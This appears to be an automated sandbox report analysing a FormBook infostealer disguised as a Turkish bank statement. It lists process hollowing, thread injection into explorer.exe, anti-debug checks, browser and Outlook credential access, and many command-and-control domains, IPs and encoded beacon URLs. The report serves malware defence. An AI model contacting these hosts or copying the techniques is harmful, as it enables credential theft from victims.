          Source: explorer.exe, 00000003.00000002.778466983.0000000001427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWua%SystemRoot%\system32\mswsock.dllEdgeSquare44x44.pngY
          Source: explorer.exe, 00000003.00000002.788702164.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0135387F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0135387F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01351260 CreateFileW,GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,CloseHandle,IsTextUnicode,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,SetWindowTextW,GetProcessHeap,HeapFree,SendMessageW,SendMessageW,SendMessageW,SetFocus,GetWindowTextW,lstrcmpW,GetWindowTextLengthW,SendMessageW,SendMessageW,GetLocalTime,GetTimeFormatW,SendMessageW,SendMessageW,GetDateFormatW,SendMessageW,SendMessageW,2_2_01351260
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136611A mov eax, dword ptr fs:[00000030h]1_2_0136611A
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136604D mov eax, dword ptr fs:[00000030h]1_2_0136604D
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0136609F mov eax, dword ptr fs:[00000030h]1_2_0136609F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_013552B7 mov ecx, dword ptr fs:[00000030h]1_2_013552B7
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01365F3F mov eax, dword ptr fs:[00000030h]1_2_01365F3F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01365F83 mov eax, dword ptr fs:[00000030h]1_2_01365F83
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01365FFE mov eax, dword ptr fs:[00000030h]1_2_01365FFE
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01365EFB mov eax, dword ptr fs:[00000030h]1_2_01365EFB
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01365ECA mov eax, dword ptr fs:[00000030h]1_2_01365ECA
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0095005F mov eax, dword ptr fs:[00000030h]1_2_0095005F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_00950109 mov eax, dword ptr fs:[00000030h]1_2_00950109
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0095013E mov eax, dword ptr fs:[00000030h]1_2_0095013E
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0095017B mov eax, dword ptr fs:[00000030h]1_2_0095017B
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136611A mov eax, dword ptr fs:[00000030h]2_2_0136611A
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136604D mov eax, dword ptr fs:[00000030h]2_2_0136604D
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0136609F mov eax, dword ptr fs:[00000030h]2_2_0136609F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_013552B7 mov ecx, dword ptr fs:[00000030h]2_2_013552B7
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01365F3F mov eax, dword ptr fs:[00000030h]2_2_01365F3F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0040CF23 LdrLoadDll,2_2_0040CF23
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01354105 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01354105
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_0135387F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0135387F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01364D13 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_01364D13
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01354105 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_01354105
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01353873 SetUnhandledExceptionFilter,2_2_01353873
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_0135387F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0135387F
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 2_2_01364D13 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_01364D13

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bemmulher.online
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.assilajamiart.com
          Source: C:\Windows\explorer.exeNetwork Connect: 85.159.66.93 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.ixirwholesale.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 208.100.26.245 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.hubyazilim.com
          Source: C:\Windows\explorer.exeDomain query: www.sem-jobs.com
          Source: C:\Windows\explorer.exeDomain query: www.7dkjhk.com
          Source: C:\Windows\explorer.exeDomain query: www.ladybillplanet.com
          Source: C:\Windows\explorer.exeDomain query: www.yeah-go.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.117 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 85.13.156.177 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 141.95.126.89 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: D90000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\cmezd.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeProcess created: C:\Users\user\AppData\Local\Temp\cmezd.exe C:\Users\user\AppData\Local\Temp\cmezd.exeJump to behavior
          Source: explorer.exe, 00000003.00000002.779414746.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267686543.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000003.00000002.788702164.00000000090D6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.779414746.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.784332589.0000000006770000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.779414746.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267686543.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.266183985.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.778466983.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000003.00000002.779414746.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.267686543.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: GetLocaleInfoW,1_2_01362890
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: EnumSystemLocalesW,1_2_01369A44
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: EnumSystemLocalesW,1_2_01369D32
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: EnumSystemLocalesW,1_2_01363594
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: EnumSystemLocalesW,1_2_013634D5
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_01369F76
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_013697EE
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: EnumSystemLocalesW,1_2_01369E66
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: GetLocaleInfoW,2_2_0136A07C
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: EnumSystemLocalesW,2_2_01363545
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: EnumSystemLocalesW,2_2_01363594
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: EnumSystemLocalesW,2_2_013634D5
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_013697EE
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: GetLocaleInfoW,2_2_01362890
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: EnumSystemLocalesW,2_2_01369A44
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_01369ADF
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: EnumSystemLocalesW,2_2_01369D32
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: GetLocaleInfoW,2_2_01369D91
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_01369F76
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_01353C2D cpuid 1_2_01353C2D
          Source: C:\Users\user\AppData\Local\Temp\cmezd.exeCode function: 1_2_013628CF GetSystemTimeAsFileTime,1_2_013628CF
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.cmezd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmezd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.cmezd.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.cmezd.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.778621822.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302378649.0000000001310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.778103844.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.778853433.0000000000A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302265970.00000000012E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		1
          Input Capture          		2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts2
          Command and Scripting Interpreter          		Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager26
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS131
          Security Software Discovery          		Distributed Component Object Model1
          Input Capture          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSH1
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items512
          Process Injection          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Rundll32          		Proc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 811416 Sample: T.C.Ziraat Bankasi A.S_Ekst... Startdate: 18/02/2023 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus detection for URL or domain 2->42 44 3 other signatures 2->44 9 T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe 19 2->9         started        process3 file4 26 C:\Users\user\AppData\Local\Temp\cmezd.exe, PE32 9->26 dropped 12 cmezd.exe 9->12         started        process5 signatures6 58 Multi AV Scanner detection for dropped file 12->58 60 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->60 62 Maps a DLL or memory area into another process 12->62 15 cmezd.exe 12->15         started        process7 signatures8 64 Modifies the context of a thread in another process (thread injection) 15->64 66 Maps a DLL or memory area into another process 15->66 68 Sample uses process hollowing technique 15->68 70 Queues an APC in another process (thread injection) 15->70 18 explorer.exe 5 6 15->18 injected process9 dnsIp10 28 www.energybig.xyz 184.94.215.91, 49701, 49702, 49703 VXCHNGE-NC01US United States 18->28 30 cutgang.net 194.102.227.30, 80 VODAFONE_ROCharlesdeGaullenr15RO Romania 18->30 32 18 other IPs or domains 18->32 46 System process connects to network (likely due to code injection or exploit) 18->46 48 Performs DNS queries to domains with low reputation 18->48 22 rundll32.exe 13 18->22         started        signatures11 process12 dnsIp13 34 www.cutgang.net 22->34 36 cutgang.net 22->36 50 System process connects to network (likely due to code injection or exploit) 22->50 52 Tries to steal Mail credentials (via file / registry access) 22->52 54 Tries to harvest and steal browser information (history, passwords, etc) 22->54 56 2 other signatures 22->56 signatures14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe44%ReversingLabsWin32.Trojan.Nsisx
          T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\cmezd.exe13%ReversingLabsWin32.Trojan.Lazy

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.cmezd.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.cmezd.exe.c80000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.fluxgreenn.space0%Avira URL Cloudsafe
          http://www.sem-jobs.com/ghii/0%Avira URL Cloudsafe
          http://ladybillplanet.com/ghii/?Y5=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC100%Avira URL Cloudmalware
          http://www.ixirwholesale.xyz/ghii/0%Avira URL Cloudsafe
          http://assilajamiart.com/ghii/?9WI6t=QaRcz&Y5=x6cX7RROW6e4Kl6qDixAJj/39fAIdeIU2pDNPD9GdPymkj2OdO8FRH0%Avira URL Cloudsafe
          http://www.octohoki.net/ghii/?9WI6t=QaRcz&Y5=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIlepjy8LvksxZfxg==100%Avira URL Cloudmalware
          http://www.energybig.xyz/ghii/?9WI6t=QaRcz&Y5=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqZV/rA0yzrxWEg==100%Avira URL Cloudmalware
          http://www.searchvity.com/?dn=100%URL Reputationmalware
          http://www.assilajamiart.com/ghii/?9WI6t=QaRcz&Y5=x6cX7RROW6e4Kl6qDixAJj/39fAIdeIU2pDNPD9GdPymkj2OdO8FRH6QHxBezwh0VT5YfLMIY+0KdzPIu3ty6XebiauUbAvcGQ==0%Avira URL Cloudsafe
          http://www.searchvity.com/100%URL Reputationmalware
          http://www.de-nagel.com/ghii/0%Avira URL Cloudsafe
          http://www.wenzid4.top/ghii/?9WI6t=QaRcz&Y5=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==100%Avira URL Cloudmalware
          http://www.cutgang.net/ghii/0%Avira URL Cloudsafe
          http://www.cutgang.net/0%Avira URL Cloudsafe
          http://www.cutgang.net0%Avira URL Cloudsafe
          http://www.octohoki.net/ghii/100%Avira URL Cloudmalware
          http://www.hubyazilim.com/ghii/100%Avira URL Cloudmalware
          http://www.cutgang.net/ghii/?Y5=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8h0%Avira URL Cloudsafe
          http://www.nortonseecurity.com/ghii/0%Avira URL Cloudsafe
          http://www.genuineinsights.cloud/ghii/?Y5=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5S24GXeXAGyBig==&9WI6t=QaRcz100%Avira URL Cloudmalware
          http://www.octohoki.net100%Avira URL Cloudmalware
          http://www.de-nagel.com0%Avira URL Cloudsafe
          http://www.assilajamiart.com/ghii/0%Avira URL Cloudsafe
          http://www.wenzid4.top0%Avira URL Cloudsafe
          http://www.ladybillplanet.com0%Avira URL Cloudsafe
          http://www.energybig.xyz/ghii/100%Avira URL Cloudmalware
          http://www.7dkjhk.com0%Avira URL Cloudsafe
          http://www.hubyazilim.com/ghii/?9WI6t=QaRcz&Y5=2K2NHyQWu2C8/rgVX1vHKTtef6ApytgwLa2EVVkQrb8caG7fKJiILTd9UXVvcQ44mr4Jwpyj4o8MhJQLFkVmLr55BQQOA1kU8g==100%Avira URL Cloudmalware
          http://www.assilajamiart.com0%Avira URL Cloudsafe
          http://www.sem-jobs.com/ghii/?9WI6t=QaRcz&Y5=s7qY3xXjkC1/TbWEYc6+5vkm1XLSScFCKWQ5egwgnE5ocsyGKPoCuhR72/pzoQfhJiIIuERBZ9Gt0DxnImXC1vT81iEZuqsQmQ==0%Avira URL Cloudsafe
          http://www.bemmulher.online/ghii/0%Avira URL Cloudsafe
          http://www.yeah-go.com/ghii/0%Avira URL Cloudsafe
          http://www.7dkjhk.com/ghii/100%Avira URL Cloudmalware
          http://www.7dkjhk.com/ghii/?Y5=el6O6QfXWJC5IcEqY7ajPQM3AxnGZ5wjtYFmnAPhTiUm5LiBD7pHZMMmJ3xfiSpQzup0R7I9jNpZRQ1DLLwlO2x3KZLMqqyEgg==&9WI6t=QaRcz100%Avira URL Cloudmalware
          http://www.sem-jobs.com0%Avira URL Cloudsafe
          http://www.bemmulher.online0%Avira URL Cloudsafe
          http://www.de-nagel.comH0%Avira URL Cloudsafe
          http://www.energybig.xyz100%Avira URL Cloudmalware
          http://www.ladybillplanet.com/ghii/100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud/ghii/100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud100%Avira URL Cloudphishing
          http://www.yeah-go.com/ghii/?Y5=bNlPHlhETrwE0CBUTa4Ov0f9IitGRas8007S+k/uRSIn2M4XJq0O4GAgtFn3DdbLFzy6ewAkUq9t07yJukgh3h16R0bz/1ZGgA==&9WI6t=QaRcz0%Avira URL Cloudsafe
          http://www.fluxgreenn.space/ghii/0%Avira URL Cloudsafe
          http://www.ixirwholesale.xyz0%Avira URL Cloudsafe
          http://www.hubyazilim.com0%Avira URL Cloudsafe
          http://www.yeah-go.com0%Avira URL Cloudsafe
          http://www.ixirwholesale.xyz/ghii/?9WI6t=QaRcz&Y5=enp1wJFMKovuqeDSVBmhA9iAASWLcNg6GTmIWmQ4dRXJlG5bG6sZRd0dvjz4e+WtF/EhWz7+kVVc2T5W4ldDnU48esvciaNoGQ==0%Avira URL Cloudsafe
          http://www.wenzid4.top/ghii/100%Avira URL Cloudmalware
          http://www.nortonseecurity.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.genuineinsights.cloud
          		66.96.162.149
          		truetrue
            		unknown
            ladybillplanet.com
            		66.235.200.146
            		truetrue
              		unknown
              assilajamiart.com
              		141.95.126.89
              		truetrue
                		unknown
                cutgang.net
                		194.102.227.30
                		truetrue
                  		unknown
                  www.energybig.xyz
                  		184.94.215.91
                  		truetrue
                    		unknown
                    parkingpage.namecheap.com
                    		198.54.117.216
                    		truefalse
                      		high
                      www.hubyazilim.com
                      		91.195.240.117
                      		truetrue
                        		unknown
                        www.sem-jobs.com
                        		85.13.156.177
                        		truetrue
                          		unknown
                          www.7dkjhk.com
                          		208.100.26.245
                          		truetrue
                            		unknown
                            shops.myshopify.com
                            		23.227.38.74
                            		truetrue
                              		unknown
                              www.wenzid4.top
                              		107.148.8.96
                              		truetrue
                                		unknown
                                natroredirect.natrocdn.com
                                		85.159.66.93
                                		truetrue
                                  		unknown
                                  www.ixirwholesale.xyz
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.octohoki.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.bemmulher.online
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.ladybillplanet.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.assilajamiart.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.yeah-go.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.cutgang.net
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.hubyazilim.com/ghii/true
                                                • Avira URL Cloud: malware
                                                		unknown
